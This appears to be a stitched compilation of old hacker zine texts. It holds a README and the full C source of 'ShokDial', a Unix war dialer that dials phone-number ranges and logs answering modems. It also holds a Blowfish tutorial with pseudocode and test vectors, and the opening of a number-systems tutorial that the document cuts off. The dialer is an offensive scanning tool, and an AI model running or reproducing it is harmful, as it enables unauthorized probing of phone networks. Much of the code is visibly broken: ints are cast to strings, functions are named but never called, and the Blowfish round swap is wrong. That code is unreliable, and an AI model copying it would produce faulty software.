dialer I've seen for linux. I don't like or use war dialers but I decided
to write it anyway....oh well.
This is new, so it may have a few bugs but it shouldn't have any. If you
see a bug or anything, please let me know (mail me at shok@sekurity.org).
WHAT YOU NEED TO DO:
--------------------
- **YOU NEED TO DO THIS***.........
In wardialer.c, at the very top..you will have three #define's you need to
change to your modem, etc.
#define MODEMPORT "/dev/cua1"
This is the COM my modem is on. You NEED to set this to yours.
If your modem is on COM1 (assuming you're using linux), then put /dev/cua0
instead of /dev/cua1.
However if you are using something like IRIX for example it is not
/dev/cua1 (if I recall)...and you'll need to set this to
your modem port.
--------------------
There is also:
#define HANGUPPORT "/dev/ttyS1"
You NEED to change this as well, if you put cua0 earlier, put ttyS0
here...if you put cua1 put ttyS1 here.....etc
However if you have IRIX or soemthing like that it will be
different.....
---------------------
Now all you have to do (and this is optional), there is:
#define TIMEOUT 30
You just set this to how long you will wait for it to try to dial a number
and this will disconnect after so long.
Type shokdial -h for help/options...
Enjoy!
Serial programming for unix.....boy this stuff is fun. Well unix
is famous for it's special files. The modem is just a file you can open(),
read(), and write() to...for that reason this program can be used on all
unixs'. The only thing different that needs to be changed, is the
#define MODEMPORT "/dev/cua1", because most unix/unix clones have their
own modem port. For example /dev/ttyS? which is COM1 (to the DOS users),
would be /dev/ttym? in IRIX. Now once this program opens the modem (via
device/special file) for reading/writing, it will write() to it, and send
it standard modem instructions like +++ATH, ATZ etc....this comes before
any dialing to get the modem ready....we also use a function to check for
"OK" so we know that all is well. On receiving this, then enter the number
we want to dial into a character buffer, append a "\r" to it (to it
actually sends the command), we then write(fd (the file desc. for
/dev/cua1), thebufwiththenum, strlen(thebufwiththenum)); Now once you do
this..you can't write "+++ATH" to it, because it will send that as the
login name (assuming you've connected to a host), so what I did, was I
opened the other modem port (there are two, /dev/cua0 and /dev/ttyS0 are
essentially the same thing (both COM1 to explain it easier), one is used
for dialing out (cua?) and one is used for dialling in and out (ttyS?). So
I opened up the other port and used that to send the command to hang up.
But all the other stuff isn't complex, they are all C primitive
instructions like ScanMin++; which would increse ScanMin by 1, repeat a
while loop, and then the next strcat(phonenum, ScanMin); ... would dial
the next number......you get the idea. That's about all there really is to
say about the technical stuff about it.
Oh yeah one thing.....when it connects, it looks for the string
"CONNECT" returned from the modem serial file. You won't get this message
from faxes as you will only get this message when the connection is
complete, so this will only return *** CONNECT *** if it was a modem. It
will both output to the screen and logfile *** CONNECT *** to
1-xxx-xxx-xxxx. You can use local or long distance, although international
numbers haven't been added at this time (not hard to do just didn't care
to add an extra scanf and an extra CountryCode variable ;)
About ShokDial (it's temp name for now)
---------------------------------------
This supports random scanning (pseudorandom to be honest, heh) and
sequential (the range you specified and up) scanning. You can give it a
range too but that still does under sequential scanning. To use random
scanning use 'shokdial -r', otherwise it will by default use sequential
scanning. For the other options type 'shokdial -h'. You want to keep track
of the version because I'd almsot guarntee this program is going to
continue changing. I need to add some ncurses GUI effects (heh) and a
function to resume scanning for those of you who are too lazy to even look
at the (by default) wardialer.log and get the last number it dialed
(assuming you used sequential scanning) and entering that as the Scan
number to begin on!
It will output to wardialer.log and on to the screen. If you have
BEEP = WANTBEEP in the Makefile, it will beep when it connects to a host.
That's about all I really have to say about it. I don't actually use war
dialers (really), so I haven't actually tested this (sorry if there are
any problems but there shouldn't be)....if you do however find a problem,
please let me know! I will fix it and send out a patched version.....you
can get all of them from ftp.janova.org or www.janova.org. Enjoy ;)
Shok
To Do:
- Add a resume function
- Any good ideas/features that should me added? Mail me at
shok@sekurity.org if you think of something useful
(don't mention a GUI or anything though anyway).
-------------
Makefile:
------------
CC = gcc
#CC = cc
CFLAGS =
#CFLAGS = -g
BEEP = WANTBEEP
#BEEP = NOWANTBEEP
#---------------------------------
all: shokdial
shokdial: shokdial.c errors.c validate.c
$(CC) $(CFLAGS) -D$(BEEP) -o shokdial shokdial.c errors.c validate.c
----------
shokdial.c
----------
/* ShokDial */
/* This is (I have never seen one anyway, I apologize if I'm wrong) */
/* the first war dialer that I've ever seen for unix. This will */
/* compile on most/all unixs' (I didn't use any spiffy or complex */
/* functions). */
/* Enjoy, */
/* --==+*~(Shok)~*+==-- */
#include <termios.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
#include <signal.h>
#define ERROR -1
#define LOGFILE "wardial.log" /* Used as default for logging */
/* unless you change this define */
/* or specify it as an option */
#define TIMEOUT 25 /* YOU WANT TO CONFIGURE THIS!!! */
/* This is how long it will wait until it */
/* gives up. */
/* You can do: */
/* ln -s /dev/cua1 /dev/modem */
/* or change this to /dev/cua1 (or whatever your COM is) */
/* cua0 = COM1 cua1 = COM2 */
#define MODEMPORT "/dev/cua1"
/* Same as above..... */
/* ttyS0 = COM1 ttyS1 = COM2 */
#define HANGUPPORT "/dev/ttyS1"
/* Global variables */
/* ---------------- */
int fd; /* fd for modem */
int numbytes; /* To verify that all the bytes were written */
int random; /* Use random scanning if this is set */
char *ProgName; /* Um duh. */
char LocalOrLong[2]; /* Dialing long distance of local */
int First3Digits; /* Such as "555" of 555-XXXX */
/* However this also serves as the area code */
/* for a long distance number */
int Last3Digits; /* Used as XXX-555-XXXX */
int ScanMin; /* Number to scan from....like 0000 and up */
int ScanMax; /* Stop scanning when this number is reached */
char *LogFile; /* Where to log connections */
char buf[512]; /* Buffer for strings returned by modem */
FILE *logfile; /* for the log file */
/* FILE *resume; */ /* To resume scanning where left off */
struct termios options; /* Baud rate, modes, etc. */
/* Function prototypes */
/* ------------------- */
void usage(void); /* Help/usage */
void version(void); /* Display version */
void intro(void); /* An introduction */
void get_num(void); /* Get phone number and scan prefix */
void get_scannum(void); /* Get range to scan */
void open_port(void); /* Open modem port for dialing */
void set_options(void); /* Set baud rate, termios, etc. */
void init_modem(void); /* Initialize the modem */
void dial_number(void); /* Dial the number */
void hangup(void); /* Hang up modem. */
void sighandler(int signum); /* Used when signals are received */
/* Check read/write/opens for errors */
void check_for_error(int fd, int num, char *s);
/* Check if the phone num was valid */
void local_validnum(int digits);
void long_validnum(int firstdigits, int lastdigits);
void main(int argc, char **argv)
{
struct sigaction sig, sigdef;
system("clear");
/* ------------------------------------------------- */
ProgName = argv[0];
if (argc == 2) {
if ((strcasecmp(argv[1], "-r")) == 0) random = 1;
else if ((strcasecmp(argv[1], "-h")) == 0) usage();
else if ((strcasecmp(argv[1], "-help")) == 0) usage();
else if ((strcasecmp(argv[1], "--help")) == 0) usage();
else if ((strcasecmp(argv[1], "-v")) == 0) version();
else if ((strcasecmp(argv[1], "--version")) == 0) version();
else LogFile=argv[1];
}
else if (argc == 3) {
if ((strcasecmp(argv[1], "-r")) == 0) {
random = 1;
LogFile=argv[2];
}
else usage();
}
else if (argc > 3) usage();
else {
fprintf(stderr, "No log file specified....using %s as log file.\n", LOGFILE);
fprintf(stderr, "-r (random scanning) option not given, using sequential scanning instead.\n");
LogFile=LOGFILE;
}
/* -------------------------------------------------- */
sleep(4);
system("clear"); /* Clear the screen */
/* -------------------------------------------------- */
sig.sa_handler = sighandler;
sigdef.sa_handler = SIG_IGN;
sigemptyset (&sig.sa_mask);
sig.sa_flags = 0;
sigaction(SIGHUP, NULL, &sigdef);
sigaction(SIGINT, &sig, NULL);
sigaction(SIGTERM, &sig, NULL);
/* -------------------------------------------------- */
logfile=fopen(LogFile, "a");
/* resume=fopen(".resume", "w"); */
intro();
if (random != 1) {
get_num(); /* Get the phone number */
get_scannum; /* Get the range to scan */
}
open_port(); /* Open MODEMPORT (by default /dev/cua1) */
set_options; /* Set baud rate, terminal modes, etc. */
init_modem(); /* Send the modem ATZ etc.. */
dial_number(); /* Dial the number/do the scanning */
hangup(); /* Disconnect */
close(fd);
}
/* -------------------------------------------------- */
void version(void)
{
fprintf(stderr, "This is ShokDial, v1.0...please keep notice of this.\n");
fprintf(stderr, "in case this program under goes some new features etc.\n");
fprintf(stderr, "\t\t--==+*~(Shok)~*+==--\n");
exit(0);
}
/* -------------------------------------------------- */
void usage(void)
{
fprintf(stderr, "Usage: %s [options] [logfile]\n", ProgName);
fprintf(stderr, "Options:\n");
fprintf(stderr, "-r for random (as opposed to sequential) scanning\n");
fprintf(stderr, "-h for help....what you're seeing now");
fprintf(stderr, "-v for the version...because this will probably undergo changes\n\n");
fprintf(stderr, "If no log file is specified, \"%s\" is used.\n", LOGFILE);
exit(0);
}
/* -------------------------------------------------- */
void intro(void)
{
printf("Shok's war dialer for UNIX (affectionately known as ShokDial).....\n");
printf("------------------------------------------------------------------\n");
printf("This is still in the beta version so it doesn't have a nice\n");
printf("graphical interface yet.\n");
printf("\nWell what you do here, is enter 0000 for the range to begin\n");
printf("scanning and 9999 to end scanning if you want to scan all the\n");
printf("possible ranges, but you can put 4444 for the nmber to start\n");
printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n");
printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n");
printf("distance.\n");
printf("\nAlso, you can use random scanning (as opposed to sequential\n");
printf("scanning) by specifying the \"-r\" option...type:\n");
printf("%s -h for help.\n\n", ProgName);
printf("Anyway..enjoy!\n");
printf("\t\t\t--==+*~(Shok)~*+==--\n\n");
printf("Hit any key to continue.\n");
getchar();
}
/* -------------------------------------------------- */
void get_num(void)
{
printf("Scanning..\n(L)ocal, Long (D)istance\n");
scanf("%2s", &LocalOrLong);
if((strncasecmp(LocalOrLong, "L", 1)) == 0) {
printf("Enter number to dial (753 for 753-XXXX): ");
scanf("%d", &First3Digits);
local_validnum(First3Digits);
}
else if ((strncasecmp(LocalOrLong, "D", 1)) == 0) {
printf("Enter number to dial (555555 for 555-555-XXXX): ");
scanf("%3d%3d", &First3Digits, &Last3Digits);
long_validnum(First3Digits, Last3Digits);
}
else {
fprintf(stderr, "You must specify L for local or D for Long Distance\n");
exit(ERROR);
}
}
/* -------------------------------------------------- */
void get_scannum(void)
{
printf("Enter number to start scanning at: ");
scanf("%4d", &ScanMin);
putchar('\n');
if ((ScanMin >= 0) && (ScanMin <= 9999)) { /* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMin);
exit(ERROR);
}
printf("Enter number to end scanning: ");
scanf("%4d", &ScanMax);
putchar('\n');
if ((ScanMax > ScanMin) && (ScanMax > 0) && (ScanMax <= 9999)) {
/* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMax);
exit(ERROR);
}
}
/* -------------------------------------------------- */
void open_port(void)
{
printf("Opening modem for dialing...\n");
fd = open(MODEMPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd == ERROR) {
perror("open");
exit(ERROR);
}
}
/* -------------------------------------------------- */
void set_options(void)
{
tcgetattr(fd, &options);
options.c_cflag |= (CLOCAL | CREAD);
options.c_cflag &= ~PARENB;
options.c_cflag &= ~CSTOPB;
options.c_cflag &= ~CSIZE;
options.c_cflag |= CS8;
options.c_iflag |= (INPCK | ISTRIP);
options.c_lflag &= ~(ICANON | ECHO | ISIG);
options.c_oflag &= ~OPOST;
cfsetispeed(&options, B115200);
cfsetospeed(&options, B115200);
tcsetattr(fd, TCSANOW, &options);
}
/* -------------------------------------------------- */
void init_modem(void)
{
printf("Initializing modem (port %s)....\n", MODEMPORT);
/* Hang up modem if it's already on */
hangup();
numbytes=write(fd, "ATZ\r", 4);
check_for_error(fd, numbytes, "write");
sleep(3);
}
/* -------------------------------------------------- */
void dial_number(void)
{
char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */
/* If long distance: phonenum = */
/* First3Digits + Last3Digits + ScanMin */
char phonenum1[20]; /* Same as above except this has "\r" as well */
char connectmsg[50]; /* the message to the log file */
printf("Giving a %s second connection timeout", TIMEOUT);
if ((strncasecmp(LocalOrLong, "L", 1)) == 0) { /* Local call */
while (1) {
if (random == 1) ScanMin = (rand() % 8889) + 1111;
strcat(phonenum, (char *)First3Digits);
strcat(phonenum, (char *)ScanMin);
strcpy(phonenum1, (char *)phonenum);
strcat(phonenum1, "\r");
if (random != 1) {
printf("Dialing %d-%d.\n", First3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}
else { /* if random == 1 */
printf("Dialing %d-%d.\n", First3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}
sleep(TIMEOUT); /* How long to wait for timeout */
numbytes = read(fd, buf, 511);
check_for_error(fd, numbytes, "read");
/* Compare the string with "CONNECT" */
if((strncmp(buf, "CONNECT", 7)) == 0) {
#ifdef WANTBEEP
fputc('\a', stderr);
#endif
fprintf(stderr, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin);
/* Log it */
sprintf(connectmsg, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin);
fputs(connectmsg, logfile);
bzero(connectmsg, 50); /* Clear the message */
}
bzero(buf, 512); /* Reset buffer */
hangup();
if (random != 1) {
/* Increase ScanMin so it scans for the next number */
ScanMin += 1;
if (ScanMin > ScanMax) {
fputc('\a', stderr);
fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n");
exit(0);
}
}
bzero(phonenum, 20); /* Clear the phone number */
bzero(phonenum1, 20); /* Ditto */
} /* End of while loop */
} /* End of if */
else { /* if LocalOrLong == "D" (Long Distance call) */
while(1) {
if (random == 1) ScanMin = (rand() % 8889) + 1111;
strcat(phonenum, "1");
strcat(phonenum, (char *)First3Digits); /* Area Code */
strcat(phonenum, (char *)Last3Digits); /* 1-XXX-555-XXXX */
strcat(phonenum, (char *)ScanMin); /* 1-XXX-XXX-0000 */
strcpy(phonenum1, (char *)phonenum); /* Copy it to another */
strcat(phonenum1, "\r"); /* buf to append "\r" to it */
if (random != 1) {
printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}
else { /* if random == 1 */
printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}
sleep(TIMEOUT); /* How long to wait for timeout */
numbytes = read(fd, buf, 511);
check_for_error(fd, numbytes, "read");
/* Compare the string with "CONNECT" */
if((strncmp(buf, "CONNECT", 7)) == 0) {
fputc('\a', stderr);
fprintf(stderr, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
/* Log it */
sprintf(connectmsg, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
fputs(connectmsg, logfile);
bzero(connectmsg, 50); /* Clear the message */
}
bzero(buf, 512); /* Reset buffer */
hangup();
if (random != 1) {
/* Increase ScanMin so it scans for the next number */
ScanMin += 1;
if (ScanMin > ScanMax) {
fputc('\a', stderr);
fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n");
break;
}
}
bzero(phonenum, 20); /* Clear the phone number */
bzero(phonenum1, 20); /* Ditto */
} /* End of while loop */
} /* End of if/else loop */
fclose(logfile);
} /* End of dial_num */
void hangup(void)
{
/* After testing put this in the init_modem() section */
/* for optimize it. */
int fd1; /* fd for modem (hang up) */
fd1=open(HANGUPPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd1 == ERROR) {
perror("open");
close(fd1);
close(fd);
exit(ERROR);
}
numbytes=write(fd1, "+++\r", 4);
check_for_error(fd1, numbytes, "write");
sleep(1);
numbytes=write(fd1, "ATH\r", 4);
check_for_error(fd1, numbytes, "write");
sleep(3);
/* Should/will check for "OK */
close(fd1);
}
void sighandler(int signum)
{
char message[50];
fprintf(stderr, "Receive signal to quit....closing up modem, logging last number dialed,\nand exitting\n");
if (random != 1) fprintf(stderr, "Last number dialed was: ");
if((strncasecmp(LocalOrLong, "L", 1)) == 0) {
if (random != 1) {
sprintf(message, "%d-%d\n", First3Digits, Last3Digits);
fprintf(stderr, message);
fprintf(logfile, message);
/* fprintf(resume, "%d%d\n", First3Digits, Last3Digits); */
}
}
else { /* if LocalOrLong == "D" */
if (random != 1) {
sprintf(message, "1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
fprintf(stderr, message);
fprintf(logfile, message);
/* fprintf(resume, "1%d%d%d\n", First3Digits, Last3Digits, ScanMin); */
}
}
/* hangup(); */
close(fd);
/* fclose(resume); */
fclose(logfile);
exit(ERROR);
}
/* void resume(void)
{
}
-----------
validate.c
-----------
/* Functions: */
/* local_validnum */
/* long_validnum */
#include <stdio.h>
#include <unistd.h>
#define ERROR -1
/* Check if it was a valid local number */
void local_validnum(int digits)
{
if ((digits > 111) && (999 > digits)) {
/* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nThe number must be 111-999\n", digits);
exit(ERROR);
}
}
void long_validnum(int firstdigits, int lastdigits)
{
if (((firstdigits > 111) && (firstdigits < 999)) && ((lastdigits > 111) && (lastdigits < 999))) {
/* Do nothing */
}
else {
fprintf(stderr, "%d%d is invalid.\nThe number must 111111-999999\n", firstdigits, lastdigits);
exit(1);
}
}
---------
errors.c
---------
/* Functions: */
/* check_for_error */
#include <unistd.h>
#include <stdio.h>
#define ERROR -1
void check_for_error(int fd, int num, char *s)
{
if (num == ERROR) {
fprintf(stderr, "Error: Unable to %s all the bytes.\n", s);
hangup();
close(fd);
exit(ERROR);
}
}
������������������������������������������������������������������������������
The Blowfish Algorithm: A Look Under The Hood
by The Messiah
Contents
* Introduction
* Key Setup
* Encryption
* Decryption
* Review
* Test Vectors
INTRODUCTION: The Blowfish encryption algorithm is one of the most well-known
encryption algorithms in the public domain. It was written by noted
cryptologist Bruce Schneier, and placed in the public domain in 1994. It uses
a variable-size key (from 32 to 448 bits), has a 64-bit blocksize, and
encrypts the plaintext 16 times, or "rounds." It is a symetric algorithm,
meaning the key used to encrypt is the same key used to decrypt. It was
designed to run best in software implementations, as opposed to DES, which
was designed to run in hardware implementations.
KEY SETUP: Blowfish has a complex key setup required before any encryption or
decryption can be done. This is the most complicated part of the algorithm.
P-array: The P array is an array of 18 32-bit entries- array[1..18] of
LongInt;
S-Boxes: There are 4 S-boxes, each with 256 32-bit entries-
array[0..255] of LongInt;
1.) Initialize the P-array and S-boxes in order with the hexadecimal
digits of Pi, starting from the .1 place.
for i := 1 to 18 do
Parray[i] := GetPiDigit(i);
for i := 0 to 255 do
SBox1[i] := GetPiDigit(i+19);
for i := 0 to 255 do
SBox2[i] := GetPiDigit(i+257);
for i := 0 to 255 do
SBox3[i] := GetPiDigit(i+513);
for i := 0 to 255 do
SBox4[i] := GetPiDigit(i+787);
2.) Cycle through the P-array, XORing the entry with a 32-bit value
from the passphrase.
Len : Byte;
PassStr : String;
password : array[1..14] of LongInt;
Move(PassStr, password, Length(PassStr));
Len := Length(PassStr);
if Len mod 4 <> 0 then Inc(Len);
for i := 1 to Len do
for j := i to Len do
Parray[j] := Parray[j] xor password[j];
for i := Len downto 1 do
for j := Len downto i do
Parray[j] := Parray[j] xor password[j];
3.) Encrypt an all-zero string wil the current S-boxes and replace
P-array[1] and P-array[2] with the value. (See the encryption
section for more info)
zeros : TCipherBlock;
zeros[0] := 0;
zeros[1] := 0;
zero := Encrypt(zero);
Parray[1] := zeros[0];
Parray[2] := zeros[1];
4.) Fill the rest of the P-array and S-boxes in order, using the
output of the encrypted string, changing the string to the
last encrypted one:
i := 3;
while i <> 18 do
begin
zero := Encrypt(zero);
Parray[i] := zeros[0];
Parray[i+1] := zeros[1];
Inc(i,2);
end;
i := 0;
while i <> 255 do
begin
zero := Encrypt(zero);
SBox1[i] := zeros[0];
SBox1[i+1] := zeros[1];
Inc(i,2);
end;
and so on....
ENCRYPTION: Encryption is done with two parts- the main part, and the F
function.
1.) The F function divides the left half of a cipherblock
(a 32-bit value) into four values and encrypts them with
the S-boxes.
function F_Funct(Input : LongInt) : LongInt;
var
foo : array[0..3] of Byte;
begin
Move(Input, foo, 8);
F_Funct := (SBox1[foo[0]] + SBox2[foo[1]] mod 232) xor SBox3[foo[2]]) + SBox4[foo[3]] mod 232;
end;
2.) The main part encrypts a 64-bit long block (two LongInts):
type
TCipherBlock = array[0..1] of LongInt;
function Encrypt(Input : TCipherBlock) : TCipherBlock;
var
I : Byte;
bin, bash : LongInt;
foo : TCipherBlock;
begin
foo := Input;
for i := 1 to 16 do (* number of rounds *)
begin
foo[0] := foo[0] xor Parray[i];
foo[1] := F_Funct(foo[0]) xor foo[1];
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
foo[1] := foo[1] xor Parray[17];
foo[0] := foo[0] xor Parray[18];
end;
Encrypt := foo;
end;
DECRYPTION: Decryption is the same as encryption, except it uses the
P-array backwards.
1.) Decryption function:
function Decrypt(Input : TCipherBlock) : TCipherBlock;
var
I : Byte;
bin, bash : LongInt;
foo : TCipherBlock;
begin
foo := Input;
for i := 16 downto 1 do
begin
foo[0] := foo[0] xor Parray[i];
foo[1] := F_Funct(foo[0]) xor foo[1];
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
foo[1] := foo[1] xor Parray[18];
foo[0] := foo[0] xor Parray[17];
end;
Decrypt := foo;
end;
REVIEW:
Ahh, how I love being a critic. Blowfish is one of my favorite
algorithms, simply because it has the largest key size, is VERY fast, and is
public domain. It is relatively new, but so far all crypanalysis has found no
real flaws. The only thing I know of is a slight weakness in 14-round
variants of Blowfish, but most, if not all, implementations of Blowfish use
the 16-round specs. Blowfish is simple, fairly easy to implement (the only
hard part for me was finding all those digits of Pi), and VERY VERY fast. In
a recent speed test using an optimized implementation of Blowfish, it used
only 18 cycles per encrypted byte. Since it is one of the newer algorithms,
it was designed with modern computing power in mind, unlike DES, which has
fallen to brute force attacks. It's also in the public domain, unlike IDEA,
so you may use it in a commercial application without having to pay
royalties. I would use this over most other algorithms for communication
(in CFB mode), or file storage, unless speed was the highest priority.
TEST VECTORS: Should you be making your own implementation of Blowfish,
here's Eric Young's test vectors-
All data is shown as a hex string with 012345 loading as
data[0]=0x01;
data[1]=0x23;
data[2]=0x45;
ecb test data (taken from the DES validation tests)
key bytes clear bytes cipher bytes
0000000000000000 0000000000000000 4EF997456198DD78
FFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFF 51866FD5B85ECB8A
3000000000000000 1000000000000001 7D856F9A613063F2
1111111111111111 1111111111111111 2466DD878B963C9D
0123456789ABCDEF 1111111111111111 61F9C3802281B096
1111111111111111 0123456789ABCDEF 7D0CC630AFDA1EC7
0000000000000000 0000000000000000 4EF997456198DD78
FEDCBA9876543210 0123456789ABCDEF 0ACEAB0FC6A0A28D
7CA110454A1A6E57 01A1D6D039776742 59C68245EB05282B
0131D9619DC1376E 5CD54CA83DEF57DA B1B8CC0B250F09A0
07A1133E4A0B2686 0248D43806F67172 1730E5778BEA1DA4
3849674C2602319E 51454B582DDF440A A25E7856CF2651EB
04B915BA43FEB5B6 42FD443059577FA2 353882B109CE8F1A
0113B970FD34F2CE 059B5E0851CF143A 48F4D0884C379918
0170F175468FB5E6 0756D8E0774761D2 432193B78951FC98
43297FAD38E373FE 762514B829BF486A 13F04154D69D1AE5
07A7137045DA2A16 3BDD119049372802 2EEDDA93FFD39C79
04689104C2FD3B2F 26955F6835AF609A D887E0393C2DA6E3
37D06BB516CB7546 164D5E404F275232 5F99D04F5B163969
1F08260D1AC2465E 6B056E18759F5CCA 4A057A3B24D3977B
584023641ABA6176 004BD6EF09176062 452031C1E4FADA8E
025816164629B007 480D39006EE762F2 7555AE39F59B87BD
49793EBC79B3258F 437540C8698F3CFA 53C55F9CB49FC019
4FB05E1515AB73A7 072D43A077075292 7A8E7BFA937E89A3
49E95D6D4CA229BF 02FE55778117F12A CF9C5D7A4986ADB5
018310DC409B26D6 1D9D5C5018F728C2 D1ABB290658BC778
1C587F1C13924FEF 305532286D6F295A 55CB3774D13EF201
0101010101010101 0123456789ABCDEF FA34EC4847B268B2
1F1F1F1F0E0E0E0E 0123456789ABCDEF A790795108EA3CAE
E0FEE0FEF1FEF1FE 0123456789ABCDEF C39E072D9FAC631D
0000000000000000 FFFFFFFFFFFFFFFF 014933E0CDAFF6E4
FFFFFFFFFFFFFFFF 0000000000000000 F21E9A77B71C49BC
0123456789ABCDEF 0000000000000000 245946885754369A
FEDCBA9876543210 FFFFFFFFFFFFFFFF 6B5C5A9C5D9E0A5A
set_key test data
data[8]= FEDCBA9876543210
c=F9AD597C49DB005E k[ 1]=F0
c=E91D21C1D961A6D6 k[ 2]=F0E1
c=E9C2B70A1BC65CF3 k[ 3]=F0E1D2
c=BE1E639408640F05 k[ 4]=F0E1D2C3
c=B39E44481BDB1E6E k[ 5]=F0E1D2C3B4
c=9457AA83B1928C0D k[ 6]=F0E1D2C3B4A5
c=8BB77032F960629D k[ 7]=F0E1D2C3B4A596
c=E87A244E2CC85E82 k[ 8]=F0E1D2C3B4A59687
c=15750E7A4F4EC577 k[ 9]=F0E1D2C3B4A5968778
c=122BA70B3AB64AE0 k[10]=F0E1D2C3B4A596877869
c=3A833C9AFFC537F6 k[11]=F0E1D2C3B4A5968778695A
c=9409DA87A90F6BF2 k[12]=F0E1D2C3B4A5968778695A4B
c=884F80625060B8B4 k[13]=F0E1D2C3B4A5968778695A4B3C
c=1F85031C19E11968 k[14]=F0E1D2C3B4A5968778695A4B3C2D
c=79D9373A714CA34F k[15]=F0E1D2C3B4A5968778695A4B3C2D1E
c=93142887EE3BE15C k[16]=F0E1D2C3B4A5968778695A4B3C2D1E0F
c=03429E838CE2D14B k[17]=F0E1D2C3B4A5968778695A4B3C2D1E0F00
c=A4299E27469FF67B k[18]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011
c=AFD5AED1C1BC96A8 k[19]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122
c=10851C0E3858DA9F k[20]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233
c=E6F51ED79B9DB21F k[21]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344
c=64A6E14AFD36B46F k[22]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122334455
c=80C7D7D45A5479AD k[23]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233445566
c=05044B62FA52D080 k[24]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344556677
chaining mode test data
key[16] = 0123456789ABCDEFF0E1D2C3B4A59687
iv[8] = FEDCBA9876543210
data[29] = "7654321 Now is the time for " (includes trailing '\0')
data[29] = 37363534333231204E6F77206973207468652074696D6520666F722000
cbc cipher text
cipher[32]= 6B77B4D63006DEE605B156E27403979358DEB9E7154616D959F1652BD5FF92CCE7
cfb64 cipher text cipher[29]=
E73214A2822139CAF26ECF6D2EB9E76E3DA3DE04D1517200519D57A6C3 ofb64 cipher text
cipher[29]= E73214A2822139CA62B343CC5B65587310DD908D0C241B2263C2CF80DA
������������������������������������������������������������������������������
Learning to Count All Over Again
by Bronc Buster
(ww.showdown.org)
(bbuster@succeed.net)
When I read 2600 I see a lot of the other readers are young people, and
a lot of them are clueless about what makes this world go around. Well
for anyone who's been to my site or talked to me, they know that I like
to break down things into layman's terms. So anyone that might read
what I write, will come away with an understanding of the subject
rather then learning a ton of new acronyms and their eyes glazing
over as they pass out. Well this article is going to focus on numbers
and how to count with them among other things. I know what you're
thinking, but read on, as I'm not talking about 1 + 1 = 2. I'm
talking complex number systems using different bases of numbers
and sometimes using letters instead of numbers. I'm talking about
getting down to the computer level and why this is so important.
Computers talk with numbers. Zeros, 0, and Ones, 1. Over time we
have figured out ways to get them to understand Base 8, or Octal
numbers, and Base 16 numbers, Hexadecimal, or HEX as it's more
well known as, but they are still based on the 0 and the 1. Well
let's start with the basics and move on from there. How do we
count in Binary, with 0 and 1? Heck with only 2 numbers how are
you going to make a number like 27? In Assembly classes they
teach a column method to learn how to count and I like it, so
I'll use it to.
So here we go, I'll briefly go over the 3 different number systems,
show you how to read them with a chart and what their bases are
along with the number and symbols they use to function. Then I'll
show you how they sign numbers to show positive and negative numbers,
along with basic adding and subtracting. Then to wrap it up I'll tell
you why it's very important for anyone in the hacking scene to
understand these very basic operations and what usage it has
(can you say Buffer Overflow?).
Counting Binary
------------------
Binary is the basic low level 0 and 1, the only two things a computer
can really understand. It's like and on and off switch, that's all it
can do. So they came up with patterns of 0 and 1 that stood for other
numbers so we could count and perform other operations all based on
the power system for the number 2. Read 2^3 is 2 raised to the 3rd
power, or 8, the top row of numbers.
16 8 4 2 1
2^4 | 2^3 | 2^2 | 2^1 | 2^0
---------------------------------------- binary = base 10
0 = 0 0 = 0
1 = 1 1 = 1
1 0 = 2 10 = 2
1 1 = 3 1 1 = 3
1 0 0 = 4 1 0 0 = 4
1 0 1 = 5 1 0 1 = 5
1 1 0 = 6 1 1 0 = 6
1 1 1 = 7 1 1 1 = 7
1 0 0 0 = 8 1 0 0 0 = 8
1 0 0 1 = 9 1 0 0 1 = 9
1 0 1 0 = 10 1 0 1 0 = 10
As you see, it's simple enough after you get the patterns down,
and if you notice, it's repeating. After going through the cycle,
you add another 1 to the end and repeat the cycle for the new ending
1. It may take some time getting used to reading it, but after a few
minutes you can pick it up pretty easily. Well this is all fine and
dandy, now you can read binary, so lets move on to base 8, or octal.
Counting Octal
------------------
Well since binary is base 2, and octal is base 8 we need a new set of
numbers. Remember binary has 2 numbers, 0 and 1, octal therefore must
have 8; 0,1,2,3,4,5,6,7. Much like binary we can make a column chart
to read these numbers.
4096 512 64 8 1
8^4 | 8^3 | 8^2 | 8^1 | 8^0
-------------------------------------------
0 = 0
1 = 1
2 = 2
3 = 3
4 = 4
5 = 5
6 = 6
7 = 7
